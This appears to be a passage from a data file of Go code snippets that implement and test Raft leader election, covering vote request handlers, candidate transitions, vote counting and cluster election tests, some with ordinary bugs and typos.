candidateLastLogTerm int\n\n\tcandidateID = args.CandidateID\n\tcandidateTerm = args.Term\n\tcandidateLastLogIndex = args.LastLogIndex\n\tcandidateLastLogTerm = args.LastLogTerm\n\n\trf.mu.Lock()\n\n\treply.Term = rf.currentTerm\n\tcurrentTerm = rf.currentTerm\n\tcurrentLastLogIndex = len(rf.logs) - 1 //TODO: fix the length corner case\n\tcurrentLastLogTerm = rf.logs[len(rf.logs)-1].Term\n\tvotedFor = rf.votedFor\n\tisFollower := rf.role == Follower\n\trf.mu.Unlock()\n\t//case 0 => I'm leader, so you must stop election\n\tif !isFollower {\n\t\tDPrintf(\"[DEBUG] Case0 I [%d] is Candidate than %d\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 1 => the candidate is not suit to be voted\n\tif currentTerm > candidateTerm {\n\t\tDPrintf(\"[DEBUG] Case1 Follower %d > Candidate %d \", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 2 => the candidate's log is not lastest than the follwer\n\tif currentLastLogTerm > candidateLastLogTerm || (currentLastLogTerm == candidateLastLogTerm && currentLastLogIndex > candidateLastLogIndex) {\n\t\tDPrintf(\"[DEBUG] Case2 don't my[%d] newer than can[%d]\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\trf.mu.Lock()\n\t//case3 => I have voted and is not you\n\tif votedFor != nil && votedFor != candidateID {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t//now I will vote you\n\n\tvar notFollower bool\n\trf.votedFor = candidateID\n\tif rf.role != Follower {\n\t\tnotFollower = true\n\t}\n\tDPrintf(\"[Vote] Server[%d] vote to Can[%d]\", rf.me, args.CandidateID)\n\trf.role = Follower\n\treply.VoteCranted = true\n\trf.mu.Unlock()\n\trf.persist()\n\tif notFollower {\n\t\trf.msgChan <- RecivedVoteRequest\n\t} else {\n\t\trf.msgChan <- RecivedVoteRequest\n\t}\n\n\treturn\n}", "func TestLearnerElectionTimeout(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\t// n2 is learner. Learner should not start election even when times out.\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n}", "func (r *Node) requestVotes(electionResults chan bool, fallbackChan chan bool, currTerm uint64) {\n\t// Votes received\n\tremaining := 0\n\tresultChan := make(chan RequestVoteResult)\n\tfor _, peer := range r.Peers {\n\t\tif r.Self.GetId() == peer.GetId() {\n\t\t\tcontinue\n\t\t}\n\t\tmsg := rpc.RequestVoteRequest{\n\t\t\tTerm: currTerm,\n\t\t\tCandidate: r.Self,\n\t\t\tLastLogIndex: r.LastLogIndex(),\n\t\t\tLastLogTerm: r.GetLog(r.LastLogIndex()).GetTermId(),\n\t\t}\n\t\tremaining++\n\t\tgo r.requestPeerVote(peer, &msg, resultChan)\n\t}\n\n\tvote := 1\n\treject := 0\n\tmajority := r.config.ClusterSize/2 + 1\n\tif vote >= majority {\n\t\telectionResults <- true\n\t\treturn\n\t}\n\tfor remaining > 0 {\n\t\trequestVoteResult := <-resultChan\n\t\tremaining--\n\t\tif requestVoteResult == RequestVoteFallback {\n\t\t\tfallbackChan <- true\n\t\t\treturn\n\t\t}\n\t\tif requestVoteResult == RequestVoteSuccess {\n\t\t\tvote++\n\t\t\tif vote >= majority {\n\t\t\t\telectionResults <- true\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treject++\n\t\t\tif reject >= majority {\n\t\t\t\telectionResults <- false\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func TestFollowerVote(t *testing.T) {\n\ttests := []struct {\n\t\tvote uint64\n\t\tnvote uint64\n\t\twreject bool\n\t}{\n\t\t{None, 1, false},\n\t\t{None, 2, false},\n\t\t{1, 1, false},\n\t\t{2, 2, false},\n\t\t{1, 2, true},\n\t\t{2, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Term: 1, Vote: tt.vote})\n\n\t\tr.Step(pb.Message{From: tt.nvote, FromGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTerm: 1, Type: pb.MsgVote})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: tt.nvote, ToGroup: pb.Group{NodeId: tt.nvote, GroupId: 1, RaftReplicaId: tt.nvote},\n\t\t\t\tTerm: 1, Type: pb.MsgVoteResp, Reject: tt.wreject},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (r *Raft) becomeCandidate() {\n\t// Your Code Here (2A).\n\tif _, ok := r.Prs[r.id]; !ok {\n\t\treturn\n\t}\n\tr.State = StateCandidate\n\tr.Term++\n\tr.Lead = None\n\tr.Vote = r.id\n\tr.votes = make(map[uint64]bool)\n\tr.votes[r.id] = true // 自己给自己投票\n\tr.actualElectionTimeout = rand.Intn(r.electionTimeout) + r.electionTimeout\n\tr.leadTransferee = None\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\tDPrintf(\"peer-%d gets a RequestVote RPC.\", rf.me)\n\t// Your code here (2A, 2B).\n\t// First, we need to detect obsolete information\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tstepdown := false\n\t// step down and convert to follower, adopt the args.Term\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\told_state := rf.state\n\t\trf.state = Follower\n\t\tif old_state == Leader {\n\t\t\trf.nonleaderCh <- true\n\t\t}\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t\tstepdown = true\n\t}\n\n\t// 5.4.1 Election restriction : if the requester's log isn't more up-to-date than this peer's, don't vote for it.\n\t// check whether the requester's log is more up-to-date.(5.4.1 last paragraph)\n\tif len(rf.log) > 0 { // At first, there's no log entry in rf.log\n\t\tif rf.log[len(rf.log)-1].Term > args.LastLogTerm {\n\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t\treturn\n\t\t} else if rf.log[len(rf.log)-1].Term == args.LastLogTerm {\n\t\t\tif len(rf.log) > args.LastLogIndex {\n\t\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treply.Term = rf.currentTerm\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// requester's log is more up-to-date than requester's.\n\t// Then, we should check whether this server has voted for another server in the same term\n\tif stepdown {\n\t\trf.resetElectionTimeout()\n\t\t// now we need to reset the election timer.\n\t\trf.votedFor = args.CandidateId // First-come-first-served\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\t/* Section 5.5 :\n\t * The server may crash after it completing an RPC but before responsing, then it will receive the same RPC again after it restarts.\n\t * Raft RPCs are idempotent, so this causes no harm.\n\t */\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false // First-come-first-served, this server has voted for another server before.\n\t}\n\treply.Term = rf.currentTerm\n\treturn\n}", "func TestVoter(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tlogterm uint64\n\t\tindex uint64\n\n\t\twreject bool\n\t}{\n\t\t// same logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 1, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t\t// candidate higher logterm\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 1, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}}, 2, 2, false},\n\t\t{[]pb.Entry{{Term: 1, Index: 1}, {Term: 1, Index: 2}}, 2, 1, false},\n\t\t// voter higher logterm\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 1, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}}, 1, 2, true},\n\t\t{[]pb.Entry{{Term: 2, Index: 1}, {Term: 1, Index: 2}}, 1, 1, true},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(tt.ents)\n\t\tr := newTestRaft(1, []uint64{1, 2}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgVote, Term: 3, LogTerm: tt.logterm, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\tif len(msgs) != 1 {\n\t\t\tt.Fatalf(\"#%d: len(msg) = %d, want %d\", i, len(msgs), 1)\n\t\t}\n\t\tm := msgs[0]\n\t\tif m.Type != pb.MsgVoteResp {\n\t\t\tt.Errorf(\"#%d: msgType = %d, want %d\", i, m.Type, pb.MsgVoteResp)\n\t\t}\n\t\tif m.Reject != tt.wreject {\n\t\t\tt.Errorf(\"#%d: reject = %t, want %t\", i, m.Reject, tt.wreject)\n\t\t}\n\t}\n}", "func (r *Raft) becomeCandidate() {\n\t// Your Code Here (2A).\n\tr.State = StateCandidate\n\tr.Lead = None\n\tr.Term++\n\tr.Vote = r.id\n\tr.votes = make(map[uint64]bool)\n\tr.votes[r.id] = true\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tcurrentTerm := rf.currentTerm\n\tif args == nil {\n\t\tDPrintf(\"Peer-%d received a null vote request.\", rf.me)\n\t\treturn\n\t}\n\tcandidateTerm := args.Term\n\tcandidateId := args.Candidate\n\tDPrintf(\"Peer-%d received a vote request %v from peer-%d.\", rf.me, *args, candidateId)\n\tif candidateTerm < currentTerm {\n\t\tDPrintf(\"Peer-%d's term=%d > candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\treply.Term = currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if candidateTerm == currentTerm {\n\t\tif rf.voteFor != -1 && rf.voteFor != candidateId {\n\t\t\tDPrintf(\"Peer-%d has grant to peer-%d before this request from peer-%d.\", rf.me, rf.voteFor, candidateId)\n\t\t\treply.Term = currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t\tDPrintf(\"Peer-%d's term=%d == candidate's term=%d, to check index.\\n\", rf.me, currentTerm, candidateTerm)\n\t} else {\n\t\tDPrintf(\"Peer-%d's term=%d < candidate's term=%d.\\n\", rf.me, currentTerm, candidateTerm)\n\t\t// begin to update status\n\t\trf.currentTerm = candidateTerm // find larger term, up to date\n\t\trf.transitionState(NewTerm) // transition to Follower.\n\t\tgo func() {\n\t\t\trf.eventChan <- NewTerm // tell the electionService to change state.\n\t\t}()\n\t}\n\t// check whose log is up-to-date\n\tcandiLastLogIndex := args.LastLogIndex\n\tcandiLastLogTerm := args.LastLogTerm\n\tlocalLastLogIndex := len(rf.log) - 1\n\tlocalLastLogTerm := -1\n\tif localLastLogIndex >= 0 {\n\t\tlocalLastLogTerm = rf.log[localLastLogIndex].Term\n\t}\n\t// check term first, if term is the same, then check the index.\n\tDPrintf(\"Peer-%d try to check last entry, loacl: index=%d;term=%d, candi: index=%d,term=%d.\", rf.me, localLastLogIndex, localLastLogTerm, candiLastLogIndex, candiLastLogTerm)\n\tif localLastLogTerm > candiLastLogTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGrant = false\n\t\treturn\n\t} else if localLastLogTerm == candiLastLogTerm {\n\t\tif localLastLogIndex > candiLastLogIndex {\n\t\t\treply.Term = rf.currentTerm\n\t\t\treply.VoteGrant = false\n\t\t\treturn\n\t\t}\n\t} else {\n\t}\n\t// heartbeat.\n\tgo func() {\n\t\trf.eventChan <- HeartBeat\n\t}()\n\t// local log are up-to-date, grant\n\t// before grant to candidate, we should reset ourselves state.\n\trf.transitionState(NewLeader)\n\trf.voteFor = candidateId\n\treply.Term = rf.currentTerm\n\treply.VoteGrant = true\n\tDPrintf(\"Peer-%d grant to peer-%d.\", rf.me, candidateId)\n\trf.persist()\n\treturn\n}", "func (a *RPC) VoteForLeader(args *RequestVoteRPCArgs,reply *bool) error{\n\t//r.ResetTimer()\n \t//fmt.Println(\"received Vote request parameter \",(*args).CandidateId,\" \",(*args).Term,\" \",(*args).LastLogTerm,\" \",(*args).LastLogIndex)\n \t//if len(r.Log)>1{\n \t//\tfmt.Println(\"Vote Request folloer parameter \",r.Id,\" \", r.CurrentTerm,\" \",r.Log[len(r.Log)-1].Term ,\" \",len(r.Log)-1)\n \t//}\n\tif r.IsLeader==2 { // if this server is follower\n\t\t//r.ResetTimer() //TODO\n\t\tif r.CurrentTerm > args.Term || r.VotedFor >-1 { // if follower has updated Term or already voted for other candidate in same term , reply nagative\n\t\t\t*reply = false\n\t\t} else if r.VotedFor== -1{ // if follower has not voted for anyone in current Term \n\t\t\tlastIndex:= len(r.Log) \n\t\t\tif lastIndex > 0 && args.LastLogIndex >0{ // if Candiate log and this server log is not empty. \n\t\t\t\tif r.Log[lastIndex-1].Term > args.LastLogTerm { // and Term of last log in follower is updated than Candidate, reject vote\n *reply=false\n }else if r.Log[lastIndex-1].Term == args.LastLogTerm{ // else if Terms of Follower and candidate is same\n \tif (lastIndex-1) >args.LastLogIndex { // but follower log is more updated, reject vote\n \t\t*reply = false\n \t} else {\n \t\t\t*reply = true // If last log terms is match and followe log is sync with candiate, vote for candidate\n \t\t}\n }else{ // if last log term is not updated and Term does not match, \n \t \t\t*reply=true//means follower is lagging behind candiate in log entries, vote for candidate\n \t\t}\n \t\n\t\t\t} else if lastIndex >args.LastLogIndex { // either of them is Zero\n\t\t\t\t*reply = false // if Follower has entries in Log, its more updated, reject vote\n\t\t\t}else{\n\t\t\t\t\t*reply = true // else Vote for candiate\n\t\t\t\t}\n\t\t}else{\n\t\t\t*reply=false\n\t\t}\n\t}else{\n\t\t*reply = false // This server is already a leader or candiate, reject vote\n\t}\n\n\tif(*reply) {\n r.VotedFor=args.CandidateId // Set Voted for to candiate Id if this server has voted positive\n }\n\t/*if(*reply) {\n\t\tfmt.Println(\"Follower \",r.Id,\" Voted for \",r.VotedFor)\n\t}else{\n\t\tfmt.Println(\"Follower \",r.Id,\" rejected vote for \",args.CandidateId)\n\t}*/\n\treturn nil\n}", "func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) {\n\tet := 10\n\tsize := 5\n\trs := make([]*raft, size)\n\tids := idsBySize(size)\n\tfor k := range rs {\n\t\trs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage())\n\t}\n\tdefer func() {\n\t\tfor k := range rs {\n\t\t\tcloseAndFreeRaft(rs[k])\n\t\t}\n\t}()\n\tconflicts := 0\n\tfor round := 0; round < 1000; round++ {\n\t\tfor _, r := range rs {\n\t\t\tswitch state {\n\t\t\tcase StateFollower:\n\t\t\t\tr.becomeFollower(r.Term+1, None)\n\t\t\tcase StateCandidate:\n\t\t\t\tr.becomeCandidate()\n\t\t\t}\n\t\t}\n\n\t\ttimeoutNum := 0\n\t\tfor timeoutNum == 0 {\n\t\t\tfor _, r := range rs {\n\t\t\t\tr.tick()\n\t\t\t\tif len(r.readMessages()) > 0 {\n\t\t\t\t\ttimeoutNum++\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// several rafts time out at the same tick\n\t\tif timeoutNum > 1 {\n\t\t\tconflicts++\n\t\t}\n\t}\n\n\tif g := float64(conflicts) / 1000; g > 0.3 {\n\t\tt.Errorf(\"probability of conflicts = %v, want <= 0.3\", g)\n\t}\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (rf *Raft) tryToBeLeader() {\n\t//Step 1\n\tvar maxVoteNum, currentSuccessNum int\n\trf.mu.Lock()\n\trf.currentTerm++\n\trf.votedFor = rf.me\n\trf.role = Candidate\n\tmaxVoteNum = len(rf.peers)\n\trf.mu.Unlock()\n\trf.persist()\n\n\tcurrentSuccessNum = 1\n\tvar mutex sync.Mutex\n\tfor i := 0; i < maxVoteNum; i++ {\n\t\tif i != rf.me {\n\t\t\tgo func(idx int) {\n\t\t\t\tvar templateArgs RequestVoteArgs\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp := rf.role == Follower || rf.role == Leader\n\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\ttemplateArgs.Term = rf.currentTerm\n\t\t\t\ttemplateArgs.CandidateID = rf.me\n\t\t\t\ttemplateArgs.LastLogTerm = rf.logs[len(rf.logs)-1].Term\n\t\t\t\ttemplateArgs.LastLogIndex = len(rf.logs) - 1\n\t\t\t\trf.mu.Unlock()\n\n\t\t\t\targs := templateArgs\n\t\t\t\tvar reply RequestVoteReply\n\t\t\t\tok := rf.sendRequestVote(idx, &args, &reply)\n\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp = rf.role == Follower || rf.role == Leader || rf.role == None\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\tif ok {\n\t\t\t\t\t\tmutex.Lock()\n\t\t\t\t\t\tcurrentSuccessNum++\n\t\t\t\t\t\tmutex.Unlock()\n\t\t\t\t\t\tif currentSuccessNum >= maxVoteNum/2+1 {\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.role = Leader\n\t\t\t\t\t\t\tfor i := 0; i < len(rf.peers); i++ {\n\t\t\t\t\t\t\t\trf.nextIndex[i] = len(rf.logs)\n\t\t\t\t\t\t\t\trf.matchIndex[i] = 0\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tgo rf.logDuplicate()\n\t\t\t\t\t\t\trf.msgChan <- BecomeLeader\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(i)\n\t\t}\n\t}\n\n}", "func TestRaftNewLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftNewLeader\"\n\n\t// Create n1 node.\n\tstorage := NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm1 := newTestFSM(ID1)\n\t// NOTE we use different cluster ID for nodes within same cluster to avoid\n\t// registering same metric path twice. This should never happen in real world\n\t// because we'll never run nodes of a same cluster within one process.\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), storage)\n\t// Create n2 node.\n\tstorage = NewStorage(NewMemSnapshotMgr(), NewMemLog(), NewMemState(0))\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), storage)\n\tconnectAllNodes(n1, n2)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Wait until a leader is elected.\n\tselect {\n\tcase <-fsm1.leaderCh:\n\tcase <-fsm2.leaderCh:\n\t}\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func TestRaftRemoveLeader(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftRemoveLeader\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\t// Create n2.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\t// Create n3.\n\tfsm3 := newTestFSM(ID3)\n\tn3 := testCreateRaftNode(getTestConfig(ID3, clusterPrefix+ID3), newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes to leader.\n\t<-fsm1.leaderCh\n\n\t// Add n2 to the cluster.\n\tpending := n1.AddNode(ID2)\n\tn2.Start(fsm2)\n\t// Wait until n2 gets joined.\n\t<-pending.Done\n\n\t// Add n3 to the cluster.\n\tpending = n1.AddNode(ID3)\n\tn3.Start(fsm3)\n\t// Wait until n3 gets joined.\n\t<-pending.Done\n\n\t// Now we have a cluster with 3 nodes and n1 as the leader.\n\n\t// Remove the leader itself.\n\tn1.RemoveNode(ID1)\n\n\t// A new leader should be elected in new configuration(n2, n3).\n\tvar newLeader *Raft\n\tselect {\n\tcase <-fsm2.leaderCh:\n\t\tnewLeader = n2\n\tcase <-fsm3.leaderCh:\n\t\tnewLeader = n1\n\t}\n\n\tnewLeader.Propose([]byte(\"data1\"))\n\tnewLeader.Propose([]byte(\"data2\"))\n\tnewLeader.Propose([]byte(\"data3\"))\n\n\t// Now n2 and n3 should commit newly proposed entries eventually>\n\tif !testEntriesEqual(fsm2.appliedCh, fsm3.appliedCh, 3) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestLearnerPromotion(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tnt := newNetwork(n1, n2)\n\n\tif n1.state == StateLeader {\n\t\tt.Error(\"peer 1 state is leader, want not\", n1.state)\n\t}\n\n\t// n1 should become leader\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tgrp2 := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tn1.addNode(2, grp2)\n\tn2.addNode(2, grp2)\n\tif n2.isLearner {\n\t\tt.Error(\"peer 2 is learner, want not\")\n\t}\n\n\t// n2 start election, should become leader\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\n\tif n1.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateFollower)\n\t}\n\tif n2.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateLeader)\n\t}\n}", "func (r *Raft) candidate() int {\n\t//myId := r.Myconfig.Id\n\t//fmt.Println(\"Election started!I am\", myId)\n\n\t//reset the votes else it will reflect the votes received in last term\n\tr.resetVotes()\n\n\t//--start election timer for election-time out time, so when responses stop coming it must restart the election\n\n\twaitTime := 10\n\t//fmt.Println(\"ELection timeout is\", waitTime)\n\tElectionTimer := r.StartTimer(ElectionTimeout, waitTime)\n\t//This loop is for election process which keeps on going until a leader is elected\n\tfor {\n\t\tr.currentTerm = r.currentTerm + 1 //increment current term\n\t\t//fmt.Println(\"I am candidate\", r.Myconfig.Id, \"and current term is now:\", r.currentTerm)\n\n\t\tr.votedFor = r.Myconfig.Id //vote for self\n\t\tr.WriteCVToDisk() //write Current term and votedFor to disk\n\t\tr.f_specific[r.Myconfig.Id].vote = 